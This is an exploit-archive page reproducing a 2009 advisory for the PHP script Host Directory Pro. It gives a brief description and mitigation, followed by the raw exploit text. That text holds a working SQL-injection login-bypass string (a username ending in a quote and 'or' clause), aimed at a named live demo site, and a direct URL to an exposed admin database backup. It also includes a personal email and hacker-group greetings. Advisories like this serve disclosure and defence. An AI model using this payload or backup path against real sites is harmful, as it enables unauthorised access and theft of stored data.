header-logo
Suggest Exploit
vendor:
Host Directory Pro
by:
ZoRLu
7,5
CVSS
HIGH
Bypass & Backup DB Disc.
20
CWE
Product Name: Host Directory Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.

A vulnerability in Host Directory Pro allows an attacker to bypass authentication and access the backup database. The vulnerability is due to the application not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted username and password. This will allow the attacker to bypass authentication and access the backup database.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated.
Source

Exploit-DB raw data:

[~] Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 28/03/09
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: New Target Buffer Overflow : ) there is a little time xD
[~]
[~] N0T: Unutulduk mu ?
[~] -----------------------------------------------------------

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

[~]----------------------------------------------------------------------
[~] Greetz tO: Cyber-Zone & Dr.Ly0N & w0cker
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-04]

Navigation

Suggest Exploit

Services By CQR